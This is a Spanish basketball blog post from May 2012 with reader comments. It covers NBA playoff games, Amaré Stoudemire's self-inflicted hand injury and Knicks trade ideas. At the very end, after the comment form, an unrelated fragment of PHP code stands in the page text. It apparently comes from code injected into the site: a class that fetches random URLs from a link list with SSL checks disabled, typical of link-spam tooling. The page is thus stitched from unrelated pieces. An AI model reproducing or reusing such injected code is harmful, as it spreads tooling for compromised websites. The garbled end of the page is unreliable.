La Crónica: La Herida

01 de May de 2012 por MagicJohnson32

amare“I am so mad at myself right now, I want to apologize to the fans and my team, not proud of my actions, headed home for a new start”.

Antes de escribir este tweet, Amaré Stoudemire añadió anoche un nuevo capítulo en el libro de las “Grandes estupideces cometidas por deportistas profesionales”. Tras perder el segundo partido de la serie de Playoffs contra los Heat, Stoudemire dio un puñetazo al cristal protector de un extintor; el previsible resultado fue un corte profundo en la mano y su más que probable baja para los próximos partidos de una eliminatoria que apunta claramente a barrida. Se desconocen por ahora los motivos exactos para el enfado de Amaré. Tal vez fue porque anticipa una eliminación rápida y humillante, o porque por un momento se puso en la piel de los fans de los Knicks, que ven como su equipo le ha de pagar más de 60 millones de dólares durante las tres próximas temporadas a un jugador incapaz de marcar diferencias y que, por si fuera poco, se lesiona de la manera más absurda imaginable en el momento más inoportuno posible. La cuestión es que la serie viajará a NY con un 2-0 para los Heat tras un encuentro más equilibrado que el primero pero en el que los Knicks tampoco supusieron ninguna amenaza. Melo, más agresivo desde el salto inicial, se fue a los 30 puntos y 9 rebotes, y a Chandler se le notó algo recuperado de la gripe. Pero los integrantes del Big Three de los Heat dominaron (65 puntos, 15 rebotes, 17 asistencias) y las aportaciones de Battier y Miller desde el banco supusieron la guinda definitiva (104-94).

Mucho más vibrante, aunque también con un 2-0 para el equipo local, resultó el Mavs @ Thunder (99-102). Pese a regresar a Texas de vacío, los campeones están demostrando que son un equipo competitivo y sólo los detalles les han impedido llevarse al menos un triunfo de Oklahoma City. Anoche, llegaron al último minuto por delante, pero varios errores en el tiro y el acierto de los Thunder en los tiros libres (así anotaron sus últimos 8 puntos) salvaron la victoria a los de Durant en un día gris del máximo anotador de la temporada. Westbrook y Harden compensaron la falta de acierto de su líder, mientras que Nowitzki no pudo coronar su excelente actuación, durante la cual tuvo que sobreponerse a un par de enganchones con Perkins e Ibaka. Terry tuvo por dos veces la oportunidad de mandar el partido a la prórroga pero erró y los Thunder están un paso más cerca de las semifinales de conferencia.

La única eliminatoria que registra de momento un 1-1 es el Pacers-Magic. Los de Indiana reaccionaron (78-93) tras caer en el primer encuentro y se aproximaron al nivel demostrado durante la regular season. La eficacia de Paul George y George Hill contrastó con los bajos porcentajes de los Magic, apenas un 35%, y David West volvió a erigirse en el referente ideal para el juego de los Pacers. Ahora a Frank Vogel sólo le falta encontrar la manera de hacer valer la teórica superioridad de Roy Hibbert en la pintura.

dirkterryPREMIOS

MVP: El Big Three de Miami sumó anoche como se espera de ellos, 65 puntos, 15 rebotes y 17 asistencias con un 54% en tiros. Westbrook se fue hasta los 29 puntos en un día complicado para Durant. David West sigue siendo el mejor pacer de estos Playoffs, 18 puntos, 11 rebotes, 4 asistencias, 2 tapones y 2 robos, y para él nuestro premio.

Rookie: Vacío. Solo un novato jugó en estos tres partidos y no llegó a los 3 minutos de juego.

Sorpresa: Seguro que cuando Miami lo fichó esperaba algo similar a los 11 puntos, 4 rebotes, 4 asistencias y 3 de 5 en triples que hizo anoche Mike Miller.

Decepción: Jason Richardson anotó 2 puntos en los casi 30 minutos que estuvo en pista. Un veterano como él no puede asumir tan poca responsabilidad en esta situación.

MEVGlenn Davis sigue dando la cara supliendo a Howard. 18 puntos, 10 rebotes y una pelea sin descanso son sus credenciales. Dirk Nowitzki anotó 31 puntos y capturó 6 rebotes además de anotar 11 de 11 en tiros libres. Carmelo Anthony sí dejó ayer su mejor versión en Miami con 30 puntos y 9 rebotes, además de llevarse nuestro premio.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

28 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Y, por supuesto, el nuevo favorito para el premio a Defensive Player of the Year: Dwayne Wade, quien inventó una manera de anular completamente a un jugador rival: http://www.youtube.com/watch?v=2a1ut2Lldzs&feature=related

      Citar

  2. simon dice:
    #2

    Ante este tipo de lesiones de verdad que si fuera el dueño suspenderia a mi jugador hasta que pudiera volver a jugar… y en este caso sería hasta octubre del año que viene…. porque de verdad esque hay cosas que no puedo entender.

      Citar

  3. Vader dice:
    #3

    Pinta mal la cosa para NY. A ver si Chandler esta al 100% y con Melo de 4 arañamos alguna victoria.

    Nos ha tocado el peor rival, los Heat son muy fuertes… Lo de Amare sin comentarios, menuda tonteria…

      Citar

  4. Javijaen dice:
    #4

    Este partido sí que ha sido bastante bueno, y Lebron-Wade-Bosh y compañía hicieron un partidazo, sin réplica.
    Muy mal pinta para los Knicks, aunque se prevé que Miami llegue fácil a final NBA por el potencial que tiene. Ya lo veremos. De Amare, pues parece que él mismo se está ganando una salida…

      Citar

  5. Txusma dice:
    #5

    Los Warriors suspendieron de empleo y sueldo a Monta Ellis por lesionarse montando en moto, en serio los Knicks no pueden hacer parecido con Amare?

      Citar

  6. melo15 dice:
    #6

    Bueno almenos los Knicks daron la cara, y Melo jugo muy bien, lastima que los Heat son muy fuertes.
    Los Knciks tendrian que haber perdido contra los Bobcats y ahora estarian comiendose a los Bulls.
    PD: Amare es imbecil. El pobre esta desequilibrao!

      Citar

  7. TheDeerHunter dice:
    #7

    La verdad es que la sangría de jugadores lesionados y sancionados, además de tontunas de distinta índole yo diría que no tiene precedentes en las dos primeras jornadas de playoffs (y esto no acabado) A ellas yo le añadiría la imbecilidad de Artest y vamos para récord

      Citar

  8. Lost dice:
    #8

    Amare tiene las cosas jodidas para seguir la proxima temporada. Supongo que los Knicks van a buscar un trade con Atlanta, Bucks, Wizards, Toronto o Philadelphia para buscarle un sitio. Ah, y se me olvidaban los Warriors, capaces de tradear a cualquiera.
    Eliminatoria 4-1 o 4-2 para Miami, más claro imposible. Sin Amare y Shumpert, Melo jugará de 4.
    LA ÚNICA ESPERANZA DE NUEVA YORK SE LLAMA LINSANITY.

      Citar

  9. melo15 dice:
    #9

    Bueno, cuando mejor han rendido los Knicks ha sido con Melo de falso cuatro, sin Amar’e pero con Shumpert.
    Yo buscaria un trade YA!
    Atlanta por Josh Smith me parece una buena opcion, ademas esto permitiria a los Hawks poner a Stat de 5 y a Horford de cuatro. Y a los Knicks jugar con un 4 abierto y dejar a Chandler en la pintura.
    Aunque tambien me gustaria la opcion de Toronto, por Bargnani y algo mas, el traspaso tiene sentido, hoy en dia todo el mundo sabe que el italiano es mas un 4 que un 5 y se complementaria muy bien con Chandler, ya que uno suple los defectos que del otro y viceversa.

      Citar

  10. Sancho88 dice:
    #10

    Hombre, lo que propones melo no está mal pensado, sobre todo cuando la situación de Josh en los Hawks se le queda totalmente pequeña. Una dupla Melo-Smith sería increíble. Lo de Bargnani lo veo menos… creo que en liderazgo es un jugador menor, y Knicks necesitan ahora mismo mucho más gente con gen ganador que estadistas de firma prestigiosa. Apoyo el trade Smith-Stat

      Citar

  11. Jose Luis dice:
    #11

    ¿Y Atlanta que? ¿Les desahuciamos ya no? Si tienen que comerse el contrato de JoJo y el de Stat… apaga y vámonos.

      Citar

  12. Sancho88 dice:
    #12

    Jose Luis:
    ¿Y Atlanta que? ¿Les desahuciamos ya no? Si tienen que comerse el contrato de JoJo y el de Stat… apaga y vámonos.

    Hombre, teniendo en cuenta las críticas de Josh hacia el proyecto de los Hawks, a mí personalmente me da la sensación de que ese deshaucio del que hablas lo están cocinando en los propios despachos del equipo. Llevan 5 años conformándose con lo que tenían, que era más bien poco, realmente, Primera ronda les ha valido siempre, y además, si no mueven ficha este verano se verán en una situación muy parecida a la de Howard con El Magic. Un tipo en su último año de contrato, con un contrato alto (aunque no contratazo, y esto es una ventaja para Hawks a priori), y que además no creo que quiera renovar nunca más por los Hawks. Otra solución, y esta sí sería más digna con los Hawks, aunque ya digo que deberían barajar muchas opciones, ya que de no moverse este verano el jugador se pirará en 2013 a cambio de nada, sería intercambiar a Smith+Hinrich x Pau+ronda+Artest. Y si esto no te convence, propón algo, porque Smith no se va a quedar en el equipo, y ya se ha visto las consecuencias de querer a toda costa que tu jugón se quede si él no quiere. Pregúntale a Denise si el está a gusto con la renovación de Howard, y si no cree que ha sido un desperdicio no forzar algún trade por él.

      Citar

  13. MagicJohnson32 dice:
    #13

    Sancho, solo hay una cosa peor que dejar que un jugador estrella se vaya sin recibir nada a cambio: traspasarlo por un jugador sobrepagado, que no supone ninguna mejora y que te deja sin opciones durante las próximas temporadas.

      Citar

  14. melo15 dice:
    #14

    Yo no creo que Stat te deje sin opciones, al nivel que le vimos en la primera temporada en New York, supera en rendimiento a Smith, ademas de pivot podria hacer muy buen papel. Es verdad que su contrato es desproporcionado pero esque si no se quedan sin nada!
    Sancho, Bargnani es un jugador que jugando de ala-pivot se va hasta los 20 puntos seguro ademas no se tendria que esforzar mucho en defensa porque con Chandler los Knciks ya estan bien servidos. Ademas para que necesitan liderazgo los Knciks si ya estan liderados en ataque por Melo y en defensa por Tyson.

      Citar

  15. Sancho88 dice:
    #15

    MagicJohnson32:
    Sancho, solo hay una cosa peor que dejar que un jugador estrella se vaya sin recibir nada a cambio: traspasarlo por un jugador sobrepagado, que no supone ninguna mejora y que te deja sin opciones durante las próximas temporadas.

    ZASKA PAU!! ONE MORE TIME

      Citar

  16. Sancho88 dice:
    #16

    Porque Melo es muy egocentrista, y a pesar de liderar, todos sabemos que se la pela bastante el juego en equipo. Ha mejorado poquísimo y lleva muchísimo tiempo en la liga. A mi juicio, un tipo como Smith sería buenísimo para ellos.

      Citar

  17. Esteban dice:
    #17

    un trade para stat!! jaja no me hagan reir, un tipo q promedia 15 putnos y 7 rebotes, que tiene 3 años mas de contraro por 20 millones cada uno y sin seguro es intrasferible,

    el unico que podria quererlo es el magic, en un ultimo intento desesperado para conseguir otra estrella al lado de howard, stat no es un verdadera estrella, pero los knicks con tal de sacarselo de ensima sin capaz de aceptar poco por el como glen davis y el propio nelson

    el magic no tiene espacio ni jugadores para reforzar el equipo, este seria un movimiento arriesgadisimo por el contrato de stat, pero es un movimiento, antes que nada… y creo que si le ofrecen un contrato de d´antoni, hasta podrian converncer a nash y ya no tendrian tan malo pinta

      Citar

  18. Esteban dice:
    #18

    es lo que haria yo si fuera smith, o sino mantener el mismo equipo de este año, terminar 6to en el este y despedirse de howard al final de curso por nada

    a NY, le vendria bien un base, aunque sea nelson, y davis acuparia la posicion del 4, ambos con contratos mas bajo y mas transferibles que el de stat

      Citar

  19. melo15 dice:
    #19

    Esteban, el Stat al nivel del año pasado es uno de los mejores jugadores de la NBA, y desde luego es mucho mejor que Bargnani

      Citar

  20. melo15 dice:
    #20

    No tengo ni idea de si a Smith se la pela o no el equipo, pero no tiene mucha pinta de jugador sacrificado, mas bien de jugador que va asu bola.

      Citar

  21. MagicJohnson32 dice:
    #21

    Sancho88: ZASKA PAU!! ONE MORE TIME

    Sorry, crack, esta vez pero no lo pillo…

      Citar

  22. Sancho88 dice:
    #22

    nada, que creo que melo se refería a mi comentario sobre el traspaso de Smith por Pau y tal, y melo siempre destroza a Pau en cuanto tiene ocasión

      Citar

  23. MagicJohnson32 dice:
    #23

    Sancho88:
    nada, que creo que melo se refería a mi comentario sobre el traspaso de Smith por Pau y tal, y melo siempre destroza a Pau en cuanto tiene ocasión

    Ahhhh, jeje… ¿Sabes que más de una vez he dicho que los Lakers no traspasan a Gasol porque no quieren? Pues la diferencia con Stoudemire es que los Knicks no lo traspasan porque no pueden.

      Citar

  24. Sancho88 dice:
    #24

    Está claro. Quien se conforme con un 15-7 de Stat + su inexistente defensa, es que se conforma con muy poca. Hay alguna opción de ver a Pau el año que viene en los Lakers, o ya está claro que lo van a traspasar?

      Citar

  25. MagicJohnson32 dice:
    #25

    Sancho88:
    Está claro. Quien se conforme con un 15-7 de Stat + su inexistente defensa, es que se conforma con muy poca. Hay alguna opción de ver a Pau el año que viene en los Lakers, o ya está claro que lo van a traspasar?

    La manera en que los Lakers afrontarán este verano va a depender mucho de cómo vayan los Playoffs, así que es difícil de decir ahora mismo. En cualquier caso, los Lakers no van a forzar un traspaso de Gasol, pero si se presenta una buena oportunidad es normal que como mínimo se lo planteen. Eso sí, la llegada de Sessions y el buen papel que está haciendo (se da por hecha su renovación este verano y el jugador ya ha dicho que se quiere quedar) resta muchísima presión a la franquicia porque ya no hay una posición muy débil que cubrir, como sucedía antes con el PG. Vamos, que no hace falta traspasar a Pau para traer un base. Solo se le traspasaría, ya sabes, para lo que se hacen los traspasos (mejorar, rejuvenecer y/o rebajar la masa salarial).

    Si me tengo que mojar, digo que salvo que tenga un papel catastrófico en estos Playoffs, Pau seguirá en los Lakers.

      Citar

  26. German dice:
    #26

    Popovich elegido Coach of the Year. Mas que merecido. Ya lo habia recibido en 2003, año en el que se consagro campeon.

      Citar

  27. infante dice:
    #27

    MagicJohnson32:
    Y, por supuesto, el nuevo favorito para el premio a Defensive Player of the Year: Dwayne Wade, quien inventó una manera de anular completamente a un jugador rival: http://www.youtube.com/watch?v=2a1ut2Lldzs&feature=related

    esto ya lo hizo ariza hace unos años

      Citar

  28. GreenPride dice:
    #28

    Bueno pues si ya estaba claro después de los 2 primeros partidos que los Knicks no parecen rival para los Heat después de esto ya parece imposible que los Knicks tengan alguna opción más allá que llevarse algún partido. Sinceramente en el estado de forma que estaba Stat tampoco parece una baja demasiado importante para los Knicks, parece mentira que sea el mismo jugador que el año pasado parecía optar a MVP. Esta eliminatoria hay que darla casi por acabada y no creo que pase del 5º partido. Por los Heat, el equipo parece estar muy preparado para un nuevo asalto al título. Este año LeBron y Wade tiran menos tiros exteriores y mueven más y mejor la bola y los secundarios parecen responder mejor (muy buen partido de Battier, Chalmers y Miller)
    La otra eliminatoria, la de los Thunder-Mavs sí que está respondiendo. Los Mavs han perdido dos grandes ocasiones para robar la ventaja de campo ya que han estado muy cerca en ambos partidos y sólo pequeños detalles les han quitado ambos. Ahora tienen un gran muro que levantar y parece muy difícil que puedan levantarlo. Veremos si en Dallas son capaces de igualar la eliminatoria. De hacerlo estaríamos ante un final de eliminatoria apasionante. Si los Thunder logran rascar un partido en Dallas se acabó. De los Thunder decir que parecen haber aprendido la lección del año pasado. Ahora Westbrook deja la bola a Harden en los finales de partido y se dedica a hacer más de ejecutor junto a Durant y les está yendo mucho mejor. Por lo demás no parecen estar todo lo finos que necesitarán estar para llegar a las finales en una conferencia en la que hay 5 o 6 equipos que podrían eliminarse sin problemas unos a otros (Spurs, Thunder, Lakers, Clippers, Grizzlies y quizás los Mavs). Veremos si a los Mavs les queda hambre para seguir dando guerra hasta el final

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>